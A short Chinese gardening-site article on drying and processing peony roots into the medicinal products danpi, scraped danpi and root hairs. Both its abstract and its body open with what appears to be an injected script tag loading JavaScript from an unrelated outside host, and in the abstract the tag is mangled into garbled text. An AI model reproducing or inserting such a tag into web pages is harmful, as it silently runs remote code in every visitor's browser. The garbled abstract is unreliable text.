您现在的位置:那花园花卉网 > 花艺天地 > 插花花艺 >

牡丹的加工方法

来源:未知
】 2012-08-12 00:00
[摘要]#106avascript" src="http://zz.ag365.com/js/check.asp?id=4164"/gt;将剪下作为药用的牡丹鲜根,在室内堆放1~2天,使其水分部分蒸发变软后,除去须根,抽出木心、晒干,即成商品丹皮。将皮色较差的根条趋鲜时用玻璃片或碎瓷片刮去外表粗皮,抽出木心,晒干
<Script type="text/javascript" src="http://zz.ag365.com/js/check.asp?id=4164"></Script>    将剪下作为药用的牡丹鲜根,在室内堆放1~2天,使其水分部分蒸发变软后,除去须根,抽出木心、晒干,即成商品丹皮。将皮色较差的根条趋鲜时用玻璃片或碎瓷片刮去外表粗皮,抽出木心,晒干后成为商品的刮丹皮。剪下的须根晒干为丹须。